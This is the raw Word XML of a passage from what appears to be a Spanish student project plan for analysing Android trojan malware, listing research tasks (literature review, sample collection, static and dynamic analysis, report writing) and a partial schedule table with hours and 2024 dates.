    <w:p w14:paraId="79AB0304" w14:textId="491F51BD" w:rsidR="00761A7A" w:rsidRPr="00624AFA" w:rsidRDefault="00761A7A" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624AFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Tarea 1: realizar un estudio de la literatura existente de malwares troyanos en Android para tener una perspectiva general del estado actual de amenazas en la plataforma. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D353A0B" w14:textId="3A8994C7" w:rsidR="000C51F7" w:rsidRPr="00624AFA" w:rsidRDefault="000C51F7" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624AFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tarea 2: elegir una familia concreta de malware y obtener muestras para su posterior análisis, además de estudiar sus medios de distribución habituales</w:t>
      </w:r>
      <w:r w:rsidR="00A62C59">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y recabar </w:t>
      </w:r>
      <w:r w:rsidR="00A62C59">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>información acerca de posibles métodos de evasión que pueda presentar, con el objetivo de una mejor estimación del trabajo a realizar en las tareas posteriores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED87685" w14:textId="184F2178" w:rsidR="00761A7A" w:rsidRPr="00624AFA"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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00624AFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: realizar un análisis estático de las muestras del malware, con la finalidad de entender el código que lo compone y las tareas que realiza</w:t>
      </w:r>
      <w:r w:rsidR="00011B39" w:rsidRPr="00624AFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la medida de lo posible. Sin requerir el descifrado completo de su código en el caso de estar este ofuscado, será importante comprender una cantidad suficiente como para discernir el funcionamiento general del malware y las acciones (maliciosas o no) que realiza en el dispositivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A9B0C6" w14:textId="0FE091C5" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00761A7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624AFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Tarea </w:t>
      </w:r>
      <w:r w:rsidR="000C51F7" w:rsidRPr="00624AFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00624AFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: realizar un análisis dinámico de las muestras, recabando los IoCs </w:t>
      </w:r>
      <w:r w:rsidR="00011B39" w:rsidRPr="00624AFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">que puedan registrarse </w:t>
      </w:r>
      <w:r w:rsidRPr="00624AFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y observando el comportamiento del </w:t>
      </w:r>
      <w:r w:rsidR="00011B39" w:rsidRPr="00624AFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>malware, comprobando paralelamente que los resultados obtenidos en el análi</w:t>
      </w:r>
      <w:r w:rsidR="00624AFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00011B39" w:rsidRPr="00624AFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>is estático se corresponden con los patrones observados en el dispositivo infectado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762BBDEE" w14:textId="1186BCF5" w:rsidR="00700BD1" w:rsidRDefault="00700BD1" w:rsidP="00761A7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tarea 5: realizar una comparativa entre los resultados obtenidos en ambos análisis, incluyendo toda la información que pueda resultar relevante para los objetivos del proyecto, y también remarcando las diferencias observadas en el caso de haberlas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F10C82" w14:textId="48806F1E" w:rsidR="00700BD1" w:rsidRPr="00624AFA" w:rsidRDefault="00700BD1" w:rsidP="00761A7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tarea 6: elaboración del informe técnico que contenga la información recogida durante las tareas previas, maquetación de los datos y redacción de estos en versión final de la memoria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF5420" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="700"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297B324F"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5" w:name="_Toc107862688"/>
      <w:bookmarkStart w:id="36" w:name="_Toc170500157"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.2.2   Estimación de tareas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="7645C81A" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E1A919E" w14:textId="656A8856" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="0021050D">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Para la elaboración de este proyecto se estima una duración total de unas 250 horas repartidas a lo largo de 3 meses, lo que equivaldría a unas 2,7 horas de trabajo diario. </w:t>
      </w:r>
      <w:r w:rsidR="00BD5CFC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F43A00">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Es importante remarcar que se trata de un proyecto realizado paralelamente al horario laboral del alumno, lo cual podría afectar significativamente </w:t>
      </w:r>
      <w:r w:rsidR="00D72C19">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">el tiempo </w:t>
      </w:r>
      <w:r w:rsidR="00A54BFE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>empleado</w:t>
      </w:r>
      <w:r w:rsidR="00F43A00">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D72C19">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>en cada</w:t>
      </w:r>
      <w:r w:rsidR="00F43A00">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> tarea. </w:t>
      </w:r>
      <w:r w:rsidR="00BD5CFC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La estimación de la duración de cada una de tareas presentadas se encuentra a continuación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF8F44B" w14:textId="77777777" w:rsidR="00443377" w:rsidRDefault="00443377" w:rsidP="0021050D">
      <w:pPr>
        <w:spacing w:after="120"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00"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="1501"/>
        <w:gridCol w:w="1501"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B0364F" w14:paraId="30E76784" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="582B71AE" w14:textId="705157AB" w:rsidR="00886B1A" w:rsidRPr="0098189E" w:rsidRDefault="00886B1A">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0098189E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Tarea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15B50358" w14:textId="544490BF" w:rsidR="00886B1A" w:rsidRPr="0098189E" w:rsidRDefault="00886B1A">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0098189E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Días</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C4E065B" w14:textId="24A51530" w:rsidR="00886B1A" w:rsidRPr="0098189E" w:rsidRDefault="00886B1A">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0098189E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Horas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3856C486" w14:textId="2347D343" w:rsidR="00886B1A" w:rsidRPr="0098189E" w:rsidRDefault="00886B1A">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0098189E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Fecha de inicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73BE1EFF" w14:textId="526D3E78" w:rsidR="00886B1A" w:rsidRPr="0098189E" w:rsidRDefault="00886B1A">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0098189E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Fecha de finalización</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B0364F" w14:paraId="48A04A32" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="387AF68A" w14:textId="2CD7A7C7" w:rsidR="00886B1A" w:rsidRDefault="00886B1A">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Tarea 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6050DFD3" w14:textId="0A3EA299" w:rsidR="00886B1A" w:rsidRDefault="00363D79">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19A79DBC" w14:textId="5E458CBD" w:rsidR="00886B1A" w:rsidRDefault="009205E8">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>40,5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E5B0758" w14:textId="1AF9FC18" w:rsidR="00886B1A" w:rsidRDefault="00363D79">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>13/3/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="153590D7" w14:textId="511D745C" w:rsidR="00886B1A" w:rsidRDefault="00D23796">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>27/3/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B0364F" w14:paraId="0446908F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="484B40E5" w14:textId="2BE45E63" w:rsidR="00886B1A" w:rsidRDefault="00886B1A">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Tarea 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A057E24" w14:textId="33BC2FCC" w:rsidR="00886B1A" w:rsidRDefault="00363D79">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FC4E29A" w14:textId="6A179FB1" w:rsidR="00886B1A" w:rsidRDefault="009205E8">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F35F847" w14:textId="2ECB8667" w:rsidR="00886B1A" w:rsidRDefault="00D23796">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>27/3/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24827677" w14:textId="021600D7" w:rsidR="00886B1A" w:rsidRDefault="001F3AC9">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>6/4/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B0364F" w14:paraId="7F034F14" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2224636A" w14:textId="1BBB3773" w:rsidR="00886B1A" w:rsidRDefault="00886B1A">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Tarea 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6906AC74" w14:textId="41B9D3AF" w:rsidR="00886B1A" w:rsidRDefault="00BD1AE3">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4012BAE7" w14:textId="4EDCF5B6" w:rsidR="00886B1A" w:rsidRDefault="009922E7">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="299904D0" w14:textId="544AC2E9" w:rsidR="00886B1A" w:rsidRDefault="001F3AC9">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>6/4/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E5A71AE" w14:textId="1AE60D2D" w:rsidR="00886B1A" w:rsidRDefault="00BD1AE3">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="001F3AC9">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="001F3AC9">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B0364F" w14:paraId="59AE2BEC" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CFDAD99" w14:textId="42EA9123" w:rsidR="00886B1A" w:rsidRDefault="00886B1A">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Tarea 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AF99FAB" w14:textId="105165F6" w:rsidR="00886B1A" w:rsidRDefault="00BD1AE3">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="056F6234" w14:textId="75BAA138" w:rsidR="00886B1A" w:rsidRDefault="009205E8">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>40,5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D171AC4" w14:textId="60AD954E" w:rsidR="00886B1A" w:rsidRDefault="00BD1AE3">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="001F3AC9">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/4/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A6A9BAF" w14:textId="18F496EB" w:rsidR="00886B1A" w:rsidRDefault="00D4609D">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>10/5/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B0364F" w14:paraId="59A2CEC9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06957A9E" w14:textId="6700303E" w:rsidR="00886B1A" w:rsidRDefault="00886B1A">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Tarea 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F8DA756" w14:textId="6C7FA985" w:rsidR="00886B1A" w:rsidRDefault="00363D79">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
